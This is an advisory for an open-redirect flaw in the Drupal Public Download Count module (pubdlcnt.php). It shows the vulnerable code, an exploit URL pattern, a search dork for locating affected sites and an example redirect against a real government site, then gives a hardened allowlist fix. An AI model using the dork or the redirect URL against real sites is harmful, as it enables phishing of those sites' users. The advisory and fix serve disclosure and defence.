Drupal Public Download Count Module - Open Redirect

2017.06.08
Snooper (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

# Exploit Title: Drupal Public Download Count Module - Open Redirect
# Date: 8-6-2017
# Software Link: https://www.drupal.org/project/pubdlcnt
# Exploit Author: Snooper
# Contact: https://t.me/Snbig
# CWE: CWE-601
# Risk: Low
# Category: webapps
# Tested on: Kali Linux
# Vulnerable File: pubdlcnt.php
# Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php
# Version: 7.x-3.1 and lower

1. Description

An open redirect is an application that takes a parameter and redirects the user to the parameter value without validating it. The weakness is used in phishing attacks to get users to visit malicious sites without realizing it.

2. Vulnerable Code:

    $url = check_url($_GET['file']);
    $nid = check_url($_GET['nid']);
    // check if this is an absolute URL; if it is relative, convert it to absolute
    if (!eregi("^(f|ht)tps?:\/\/.*", $url)) {
      $url = "http://" . $_SERVER['SERVER_NAME'] . $url;
    }
    // an attacker-supplied absolute URL passes straight through to the Location header
    if (is_valid_file_url($url)) {
      $filename = basename($url);
      pubdlcnt_update_counter($url, $filename, $nid);
      header('Location: ' . $url);
      exit;
    }

3. Exploit:

http://host/sites/all/modules/pubdlcnt/pubdlcnt.php?file=[ Open Redirect Vul ]

4. Example:

https://www.stats.gov.sa/sites/all/modules/pubdlcnt/pubdlcnt.php?file=http://leader.ir

5. Solution:

Update to version 8.x-1.x-dev
https://www.drupal.org/project/download_count/releases/8.x-1.x-dev
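
The root cause in the snippet above is that the redirect target is accepted as long as it looks like a URL and points at a file; the host is never compared against anything. The following is an added, hardened version of the redirect step written for this page; it is not code from the pubdlcnt module, the Drupal project or the advisory author. The function name safe_download_url, the allowlist array and the example host names are assumptions. It only redirects to hosts on an explicit allowlist, rejects protocol-relative and non-http(s) inputs, and refuses control characters that could corrupt the Location header.

```php
<?php
// Added example for this advisory, not part of the pubdlcnt module.
// Names (safe_download_url, $allowedHosts, the example hosts) are assumptions.

/**
 * Return an absolute https URL on an allowed host, or null if the
 * requested target must be refused.
 *
 * @param string   $requested    raw value of the "file" parameter
 * @param string[] $allowedHosts hostnames the site may redirect to
 * @param string   $serverName   this server's own hostname (for relative paths)
 */
function safe_download_url(string $requested, array $allowedHosts, string $serverName): ?string
{
    $requested = trim($requested);
    if ($requested === '') {
        return null;
    }

    // Control characters (including CR/LF) never belong in a redirect target.
    if (preg_match('/[\x00-\x1F\x7F]/', $requested)) {
        return null;
    }

    $parts = parse_url($requested);
    if ($parts === false) {
        return null;
    }

    $allowed = array_map('strtolower', $allowedHosts);

    if (isset($parts['scheme']) || isset($parts['host'])) {
        // Absolute or protocol-relative input ("//host/x" parses with a host
        // and no scheme, so it lands here and fails the scheme check).
        $scheme = strtolower($parts['scheme'] ?? '');
        $host   = strtolower($parts['host'] ?? '');
        if (!in_array($scheme, ['http', 'https'], true)) {
            return null;
        }
        if (!in_array($host, $allowed, true)) {
            return null;
        }
        $path = $parts['path'] ?? '/';
    } else {
        // Relative input: accept only a rooted path and pin it to this host.
        $path = $parts['path'] ?? '';
        if ($path === '' || $path[0] !== '/') {
            return null;
        }
        $host = strtolower($serverName);
    }

    // Refuse path traversal and backslashes, which some clients treat as "/".
    if (strpos($path, '..') !== false || strpos($path, '\\') !== false) {
        return null;
    }

    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    return 'https://' . $host . $path . $query;
}

// Usage in the download counter endpoint (assumed allowlist values).
$allowedHosts = ['www.example.org', 'files.example.org'];
$target = safe_download_url($_GET['file'] ?? '', $allowedHosts, $_SERVER['SERVER_NAME'] ?? 'www.example.org');

if ($target === null) {
    // Log and refuse instead of redirecting to an arbitrary destination.
    http_response_code(400);
    exit('Invalid download URL');
}

header('Location: ' . $target, true, 302);
exit;
```

With this check in place, a "file" value naming a host outside the allowlist is answered with a 400 instead of a 302, and the counter update and file-extension check of the original module can be kept unchanged after the validation step. Logging the rejected values is also useful on the detection side, since repeated off-list hosts in that parameter are a clear sign the endpoint is being probed for this weakness.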

References:

https://www.owasp.org/index.php/Open_redirect
https://cwe.mitre.org/data/definitions/601.html

